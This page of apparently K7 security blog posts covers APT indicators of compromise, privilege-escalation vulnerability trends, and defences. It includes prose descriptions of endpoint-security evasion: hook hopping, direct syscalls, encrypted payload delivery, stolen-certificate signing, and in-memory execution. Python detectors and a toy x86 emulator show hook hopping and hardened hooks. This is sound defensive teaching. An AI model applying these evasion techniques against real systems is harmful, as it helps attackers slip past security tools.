Repeated failed login attempts using non-existent user accounts, successful login attempts to machines that deviate from established baseline logins, login activity at odd hours, etc. could mean something is amiss.

Anomalies in Security Settings

Unauthorized disabling of security software, tampering of exclusion lists in firewalls and Anti-Virus, even for a brief period of time, could indicate a compromise.

Anomalies in User Account Activity

Changes in behavior of a user account such as time of activity, type of information accessed, systems accessed, etc. could indicate a compromise.
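As an added example (not from the AVAR paper), the login and account-activity indicators above can be turned into a small detector over Windows Security log records. The baseline window, the business-hours range, the hostnames and the alert threshold are assumptions; the event IDs (4624 successful logon, 4625 failed logon) and the NTSTATUS value 0xC0000064 for “user does not exist” are the real ones Windows writes. The records are constructed for illustration:

```python
# Added example, not from the AVAR paper: login irregularity detection.
from collections import Counter, defaultdict

# Constructed records: (timestamp, event_id, user, host, status)
BASELINE = [                      # a week of ordinary activity (constructed)
    ("2014-09-01 09:12", 4624, "alice", "ws-14", "0x0"),
    ("2014-09-01 09:40", 4624, "bob",   "ws-22", "0x0"),
    ("2014-09-02 10:05", 4624, "alice", "ws-14", "0x0"),
    ("2014-09-02 11:30", 4624, "bob",   "ws-22", "0x0"),
    ("2014-09-03 14:15", 4624, "alice", "fs-01", "0x0"),
]
NEW_EVENTS = [                    # the window under investigation (constructed)
    ("2014-09-10 02:17", 4625, "backup", "dc-01", "0xC0000064"),
    ("2014-09-10 02:17", 4625, "svc_db", "dc-01", "0xC0000064"),
    ("2014-09-10 02:18", 4625, "admin2", "dc-01", "0xC0000064"),
    ("2014-09-10 02:25", 4624, "alice",  "dc-01", "0x0"),   # new host, 02:25
    ("2014-09-10 10:02", 4624, "bob",    "ws-22", "0x0"),   # normal
]

NO_SUCH_USER = "0xC0000064"        # substatus: account does not exist
WORK_HOURS = range(7, 20)          # assumed 07:00-19:59 business window
NONEXISTENT_THRESHOLD = 3          # ghost-account failures per host before alerting


def hour_of(ts: str) -> int:
    return int(ts.split(" ")[1].split(":")[0])


def build_baseline(events: list) -> dict:
    """Map each user to the hosts they normally log on to (successes only)."""
    seen = defaultdict(set)
    for _, eid, user, host, _ in events:
        if eid == 4624:
            seen[user].add(host)
    return seen


def find_login_anomalies(baseline_events: list, new_events: list) -> list:
    """Return (host, reason) for each indicator tripped in `new_events`."""
    baseline = build_baseline(baseline_events)
    findings = []
    # Repeated failures with accounts that do not exist: someone guessing names.
    ghosts = Counter(host for _, eid, _, host, status in new_events
                     if eid == 4625 and status == NO_SUCH_USER)
    for host, n in ghosts.items():
        if n >= NONEXISTENT_THRESHOLD:
            findings.append((host, f"{n} failed logons with non-existent accounts"))
    # Successful logons that deviate from each user's baseline or the work window.
    for ts, eid, user, host, _ in new_events:
        if eid != 4624:
            continue
        if host not in baseline.get(user, set()):
            findings.append((host, f"{user} logged on to a host outside baseline"))
        if hour_of(ts) not in WORK_HOURS:
            findings.append((host, f"{user} logged on at odd hour {ts[-5:]}"))
    return findings


if __name__ == "__main__":
    for host, reason in find_login_anomalies(BASELINE, NEW_EVENTS):
        print(f"{host}: {reason}")
```

On the constructed data all three findings point at the domain controller within ten minutes: a burst of non-existent accounts followed by a real user’s first-ever logon there at 02:25. That clustering, rather than any single event, is what an analyst should escalate.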

Prevention/Detection

Along with multi-factor authentication for sensitive accounts, updated Anti-Virus software that detects unwanted tools, a strong password policy, etc. the following solutions can be implemented to augment the network’s security:

Unified Extensible Firmware Interface (UEFI) and Secure-Boot

Boot-time privilege escalation, such as that attempted by boot kits, can be significantly reduced by using UEFI/Secure Boot enabled machines: the firmware verifies the signatures of the boot loader and early OS components before running them, providing a level of trust from boot-up time.

Early Launch Anti-Malware (ELAM)

Security solutions with early-loading components that are capable of detecting and blocking unauthorized kernel code before it runs should be installed throughout the network.

Click here to read the final part of this blog


Lokesh Kumar
K7 Threat Control Lab

If you wish to subscribe to our blog, please add the URL provided below to your blog reader:

http://blog.k7computing.com/feed/

Surge in Unauthorized Access Grabbing

Monday, March 30th, 2015

Authorization is the access control mechanism that grants a process, an application or a class of users access to sensitive system resources based on their privilege level. Privacy and security concerns arise when system resources are accessed by an unauthorized process, application or user.

Application and system developers strive to build secure authorization into their software. Hackers, on the other hand, keep coming up with new exploit techniques to elevate the privilege level of a specific process, system or user. Many attacks start with an entry into the targeted system with limited privileges, followed by an attempt to elevate privileges by exploiting a vulnerability in the OS itself or in third-party software.

We conducted a short piece of research on Elevation of Privilege (EoP) vulnerabilities using publicly available information on vulnerabilities discovered in operating systems, desktop applications and browsers. Interestingly, the data indicates a significant rise in EoP vulnerabilities over the past two-and-a-half years.

From our research set of Microsoft Windows operating system vulnerabilities found over this period, 115 out of 700 vulnerabilities, approximately 16%, were privilege escalation vulnerabilities. The data suggests that attackers and malware writers are focusing more on EoP vulnerabilities in order to carry out their attacks as silently as possible.

Exploiting an EoP vulnerability on its own might not be sufficient for the attacker to achieve the intended destructive behaviour, forcing the attacker to look for yet more vulnerabilities in the system to exploit.

The following is a list of commonly exploited Windows components:

The Group Policy Service
Windows kernel-mode driver (Win32k.sys)
Cryptography Next Generation kernel-mode driver (cng.sys)
WebDAV kernel-mode driver (mrxdav.sys)
TS WebProxy Windows component
Windows User Profile Service (ProfSvc)
Microsoft IME
TypeFilterLevel Checks
Windows audio service component
Windows TCP/IP stack (tcpip.sys, tcpip6.sys)
Kerberos KDC
FASTFAT system driver, FAT32 disk partitions
Message Queuing service
.NET Framework
Windows Task Scheduler
Windows Installer service
DirectShow
Ancillary Function Driver
On-Screen Keyboard
ShellExecute API
Group Policy preferences
NDProxy component
Local Remote Procedure Call
Windows audio port-class driver (portcls.sys)
Hyper-V
USB drivers
Windows App Container
DirectX graphics kernel subsystem (dxgkrnl.sys)
Service Control Manager (SCM)
NT Virtual DOS Machine (Ntvdm.exe)
asynchronous RPC requests handling (Rpcss.dll)
TrueType font files handling
Windows Print Spooler (win32spl.dll)
NTFS kernel-mode driver (ntfs.sys)
Windows CSRSS (cmd.exe)
Remote Desktop ActiveX control (mstscax.dll)
Windows USB drivers

We see that attackers often aim for a highly destructive attack by chaining a privilege escalation vulnerability with a code execution vulnerability.

Techniques employed by malware writers constantly evolve to achieve the desired privilege escalation undetected. Many privilege elevation techniques are publicly documented, such as:

  1. METHOD OF PROVIDING A COMPUTER USER WITH HIGH LEVEL PRIVILEGES, PATENT 7,945,947
  2. Exploiting the known failure mechanism in DDR3 memory referred to as Row Hammer to gain kernel privileges, with the only "patch" being a replacement of the DRAM!

Sometimes it is simply not possible to patch a vulnerability.

Elevation of Privilege is not limited to operating systems but is also seen in desktop applications, browsers, web applications and even hardware. With the increasing popularity of the Internet of Things across devices everywhere, exploiting an Elevation of Privilege vulnerability in just one link of an Internet of Things deployment could give the attacker complete control of the whole system.

Image courtesy of:

tompattersontalks.blogspot.in

Priyal Viroja, Vulnerability Researcher, K7TCL


Shell Team Six: Zero Day After-Party (Part IV)

Friday, March 13th, 2015

This is the fourth part of a six-part blog based on the paper submitted by my colleague Gregory and myself on Advanced Persistent Threats (APT), for AVAR 2014.

Continuing from the third part of our paper…

Security Solutions Bypass

The next layer of defence that an attacker confronts is the endpoint security provided by third-party vendors. Host Intrusion Prevention Systems (HIPS), for example, detect ROP exploitation and prevent shell code execution by injecting their modules into commonly exploited applications and placing hooks on various operating system APIs. However, these inline hooks, meant to monitor suspicious activity and detect exploitation attempts, run at the same privilege level as the rest of the code in the process, including the attacker's shell code, which undermines the security solution's ability to maintain its hooks and intercept all the required APIs.

Hook Hopping

In this technique the attacker's code executes the standard (and well-known) function prologue of the intercepted API itself, and then transfers control to the instruction just past the JMP that the hook placed at the start of the API to intercept the call. The hook handler never runs, so the call goes unobserved.

Fig.10: Control flow depicting bypass of JMP instruction in a hooked API

The DeputyDog campaign [6], which exploited the CVE-2013-3893 vulnerability, employed the above technique to bypass the interception of WinExec() API calls by security software.

Direct SYS Calls

Here the attacker's code issues the system call itself, using a short sequence of CPU instructions that transfer control to the kernel directly from the application code instead of going through the OS-provided user-mode API wrappers where the security solution's hooks live.

Payload Delivery via Documents or Sparse Encrypted Fetches

Shell code used as part of the exploitation chain may need to execute a larger payload to establish a backdoor on the machine. To prevent this payload from being detected by security scanners, the attackers can:

  • Embed the payload in popular document formats like PDF, DOC, etc. When run, the shell code locates this payload in the document by scanning for specific magic markers, extracts it and executes it, or
  • Download smaller encrypted chunks of the larger payload stealthily onto the victim’s machine. These chunks are later reassembled and executed on the victim’s machine.

Anti-Virus Bypassing

The attackers use custom cryptors to encrypt their malicious code in an attempt to defeat traditional signature-based Anti-Virus scanners. At times, these files are digitally signed using certificates stolen from trusted publishers to appear legitimate and to circumvent local system policies.

The notorious Stuxnet malware for instance used malicious kernel drivers signed with valid stolen digital certificates to bypass Anti-Virus scanners.

Equipped with information about the security solutions installed on the organization's endpoints, the attackers often test these payloads against the same vendor's scanner for detection before deploying them onto the victim's machine.

Volatile Threats

The attackers execute their malicious payloads directly on the victim's machine without ever writing the file to the machine's disk. Traditional security solutions that scan only files on disk in real time cannot see payloads that are written and executed directly in memory. Behavioural analysis systems often do not intercept these operations either, for fear of additional performance overhead.

In the BaneChant APT campaign [7], the shell code downloaded an innocuous-looking XOR-encoded binary as the first-level payload. This binary in turn downloaded a second-level payload, an executable masquerading as an image file to get past security scanners. Once downloaded, this binary was executed directly in memory.

Indicators of Compromise

The initial compromise stage of an APT represents the attacker's attempts to gain entry into the target organization's network. In an environment defended by multiple layers of logging and security, it is quite a challenge for an attacker to succeed without leaving digital footprints behind. Provided below are some symptoms that could indicate a compromise of an organization's network:

Suspicious System Changes

The presence of unauthorized applications that start from uncommon auto-start locations could indicate a compromise. File names that resemble popular or operating system files like svchost.exe, acrord32.exe, etc. but dwell in unusual locations should also raise suspicion.

Fig.11: System file name present in an unusual auto-startup location

Hidden instances of popular applications like Internet Explorer, code-injection attempts into trusted operating system processes, installation of unauthorized software, loading of driver files without a corresponding entry in the Service Control Manager, etc. could also indicate a compromise.
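The auto-start and file-name checks above can be automated over an inventory of auto-start entries. The Python script below is an added example (not from the paper or any vendor's product) that flags three things on a constructed inventory: a well-known binary name running from somewhere it never should, a name one character away from a well-known one, and any auto-start image living in a user-writable directory. The inventory, the allowlist of legitimate directories, the list of user-writable prefixes and the reason strings are assumptions for the example:

```python
import ntpath

# Constructed auto-start entries (not real data): (auto-start location, image path).
SAMPLE_AUTOSTARTS = [
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
     r"C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AcroRd32.exe"),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     r"C:\Users\alice\AppData\Roaming\svchost.exe"),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     r"C:\Users\alice\AppData\Local\Temp\update.exe"),
    (r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup",
     r"C:\Windows\Temp\svch0st.exe"),
    (r"HKLM\System\CurrentControlSet\Services\Example",
     r"C:\Windows\System32\svchost.exe"),
]

# Well-known binaries and the only directories they are expected to run from
# (an assumed allowlist; in practice it comes from the organisation's gold image).
KNOWN_IMAGES = {
    "svchost.exe": (r"c:\windows\system32", r"c:\windows\syswow64"),
    "lsass.exe": (r"c:\windows\system32",),
    "explorer.exe": (r"c:\windows",),
    "acrord32.exe": (r"c:\program files", r"c:\program files (x86)"),
}

# Directory prefixes an unprivileged user (or a dropper running as one) can write to.
USER_WRITABLE = ("c:\\users\\", "c:\\windows\\temp\\")


def under(directory, prefix):
    """True if `directory` is `prefix` itself or one of its subdirectories."""
    return directory == prefix or directory.startswith(prefix + "\\")


def edit_distance(a, b):
    """Plain Levenshtein distance: each substitution, insertion or deletion costs 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def audit_autostarts(entries, known=KNOWN_IMAGES, writable=USER_WRITABLE):
    """Return the suspicious entries, each with the list of reasons it was flagged."""
    flagged = []
    for location, image in entries:
        directory = ntpath.dirname(image).lower()
        name = ntpath.basename(image).lower()
        reasons = []
        if name in known:
            # A real system file name outside its home directory is a classic impostor.
            if not any(under(directory, p) for p in known[name]):
                reasons.append("known_name_unusual_location")
        else:
            # Names one edit away from a system file name (svch0st, lsas, ...) are lookalikes.
            closest = min(known, key=lambda k: edit_distance(name, k))
            if edit_distance(name, closest) <= 1:
                reasons.append("resembles_" + closest)
        if any(directory.startswith(p) or directory == p.rstrip("\\") for p in writable):
            reasons.append("user_writable_path")
        if reasons:
            flagged.append({"location": location, "image": image, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for entry in audit_autostarts(SAMPLE_AUTOSTARTS):
        print(entry)
```

The Adobe Reader entry and the genuine svchost.exe service are left alone; the three remaining entries are flagged, the AppData copy of svchost.exe for two reasons at once. Path comparison uses ntpath so the script runs on any platform against an exported inventory.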

Unusual Disk Activity

Exploitation attempts using heap spray techniques tend to use significant amounts of memory. At times this leads to high disk activity due to frequent page-file access. Attempts to sweep a user's profile area for personal or confidential data could also result in increased disk activity, which could indicate a compromise.

Compromised Security Components

Partially enabled security features or completely disabled security solutions on endpoints, even for a brief period of time, could indicate that something is wrong.

Loading of Unsigned Drivers in x64 Systems

x64-based Microsoft Windows verifies driver signatures and allows only digitally signed driver binaries to load. Unsigned malware that wants to load early in the boot process therefore has to disable this verification.

Boot kits, for instance, tend to bypass the driver signing policy by making persistent system-wide changes. This gives a simple check: on a clean machine, an attempt to load a custom unsigned "test" driver is refused with an alert (Fig.12); if such a driver loads successfully, signature enforcement has been tampered with, which could indicate a boot-kit compromise.

Fig.12: Windows alerting on loading an unsigned driver

Prevention/Detection

Mock Phishes

Since human behaviour is manipulated to the attacker's advantage during this stage of an APT, training programs should be conducted at regular intervals to educate users about the latest intrusion techniques. These programs should explain the importance of security with adequate examples, and aim to change user behaviour so that security policies are followed correctly.

Penetration-test emails mimicking a spear phishing attack could be used to improve employees' resilience to such attacks [8].

Virtualization

Email applications and web browsers could be run in a virtualized environment that is automatically reverted to a clean snapshot on startup. Malicious email attachments and drive-by downloads would be contained within this environment, and reboot-resilient code would not survive the revert, assuming that the malware cannot escape the guest VM and infect the host.

Intent to View

Suspicious or unknown email attachments should be stripped by the security solution and released to a user only if he or she explicitly requests them.

Detecting Bypassing Attempts

Evasion techniques such as hook hopping can be identified by breaking the basic assumptions made by the attacker. Instead of leaving the bytes that follow the initial JMP untouched, the security solution can relocate a variable (randomly chosen) number of instructions from the function prologue into its trampoline and replace them with its own code sequence. Shell code that executes the standard prologue and jumps past the initial JMP then lands on a code sequence controlled by the security solution rather than on the original function body.

Some security solutions fill the bytes just past the initial JMP with int 3 (0xCC) instructions, so that any code landing there triggers a debug exception, breaking the attacker's flow of execution and handing control to the security solution's exception handler.

Hook bypass attempts using direct system calls from user-mode processes can be flagged by a kernel module that checks where each user-mode to kernel-mode transition originates: a system call whose return address does not lie within the OS's native system-call layer (ntdll.dll on Windows) is suspect.
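To make hook hopping (described under "Hook Hopping" above) and the two countermeasures just discussed concrete, here is an added Python example, not from the paper or any vendor's product, that emulates a toy CPU understanding only the real x86-32 encodings involved: the five-byte hot-patch prologue mov edi,edi / push ebp / mov ebp,esp, nop, ret, jmp rel32 and int 3. It installs a classic hook that relocates only the prologue, shows the attacker's stub skipping it, then installs the hardened hook that relocates more instructions and fills the gap with int 3. The addresses, the nop-only body standing in for the "API", and the single nop standing in for the handler's inspection logic are assumptions for the example:

```python
# Real x86-32 encodings of the few instructions the toy CPU understands.
MOV_EDI_EDI = b"\x8b\xff"   # the 2-byte NOP that starts hot-patchable Windows APIs
PUSH_EBP = b"\x55"
MOV_EBP_ESP = b"\x8b\xec"
NOP = b"\x90"
RET = b"\xc3"
INT3 = b"\xcc"
PROLOGUE = MOV_EDI_EDI + PUSH_EBP + MOV_EBP_ESP   # exactly 5 bytes, the size of a jmp rel32

# Assumed layout of the toy address space (example values, not real addresses).
API = 0x100        # the intercepted API, e.g. WinExec: prologue, 4 x nop, ret
HANDLER = 0x200    # the security solution's hook handler followed by its trampoline
ATTACKER = 0x300   # the attacker's hook-hopping stub
API_BODY = NOP * 4 + RET


def jmp_rel32(at, target):
    """Encode a `jmp rel32` located at `at` that lands on `target`."""
    return b"\xe9" + (target - (at + 5)).to_bytes(4, "little", signed=True)


class ToyCpu:
    def __init__(self, size=0x1000):
        self.mem = bytearray(size)
        self.trace = []   # every EIP value executed, so callers can see what ran

    def run(self, eip, max_steps=64):
        """Execute from `eip` until `ret` (returns "ret") or `int 3` (returns "int3@<addr>")."""
        for _ in range(max_steps):
            self.trace.append(eip)
            two = bytes(self.mem[eip:eip + 2])
            op = self.mem[eip]
            if two in (MOV_EDI_EDI, MOV_EBP_ESP):
                eip += 2                      # register moves: no control-flow effect here
            elif op in (0x55, 0x90):
                eip += 1                      # push ebp / nop
            elif op == 0xE9:
                rel = int.from_bytes(self.mem[eip + 1:eip + 5], "little", signed=True)
                eip = eip + 5 + rel
            elif op == 0xC3:
                return "ret"
            elif op == 0xCC:
                return "int3@%#x" % eip       # debug exception: the security solution's handler gets control
            else:
                raise ValueError("unsupported opcode %#x at %#x" % (op, eip))
        raise RuntimeError("step limit reached")


def build(hardened):
    """Lay out the API, install the hook (classic or hardened) and the attacker's stub."""
    cpu = ToyCpu()
    cpu.mem[API:API + len(PROLOGUE) + len(API_BODY)] = PROLOGUE + API_BODY
    # The classic hook relocates only the 5 prologue bytes its jmp overwrites; the
    # hardened hook also relocates the 4 single-byte instructions that follow them.
    reloc = 5 + (4 if hardened else 0)
    saved = bytes(cpu.mem[API:API + reloc])
    # Handler: one nop stands in for the inspection logic, then the trampoline
    # (relocated original bytes) and a jump back to the first untouched instruction.
    tramp_at = HANDLER + 1
    handler = NOP + saved + jmp_rel32(tramp_at + len(saved), API + reloc)
    cpu.mem[HANDLER:HANDLER + len(handler)] = handler
    cpu.mem[API:API + 5] = jmp_rel32(API, HANDLER)
    if hardened:
        # Anything that lands just past the jmp now hits int 3 instead of live code.
        cpu.mem[API + 5:API + reloc] = INT3 * (reloc - 5)
    # Hook hopping: run the well-known prologue locally, then jump past the hook's jmp.
    stub = PROLOGUE + jmp_rel32(ATTACKER + len(PROLOGUE), API + 5)
    cpu.mem[ATTACKER:ATTACKER + len(stub)] = stub
    return cpu


def call(cpu, entry):
    """Run from `entry` and report whether the hook handler was ever executed."""
    cpu.trace.clear()
    return {"result": cpu.run(entry), "hook_ran": HANDLER in cpu.trace}


if __name__ == "__main__":
    for hardened in (False, True):
        cpu = build(hardened)
        print("hardened" if hardened else "classic", call(cpu, API), call(cpu, ATTACKER))
```

With the classic hook, a legitimate call enters through the handler while the attacker's stub reaches the API body without the handler ever running. With the hardened hook the legitimate call still works, because the relocated instructions live in the trampoline, but the stub's jump to API+5 lands on int 3 and the security solution regains control. The same idea carries over to real hooks: whatever the attacker assumes about the bytes after the JMP is what the defender should randomise.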

Click here to read the fifth part of this blog

References:

[6] http://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-part-2-zero-day-exploit-analysis-cve-2013-3893.html
[7] http://www.fireeye.com/blog/technical/malware-research/2013/04/trojan-apt-banechant-in-memory-trojan-that-observes-for-multiple-mouse-clicks.html
[8] http://phishme.com/product-services/what-is-phishme

Lokesh Kumar
K7 Threat Control Lab
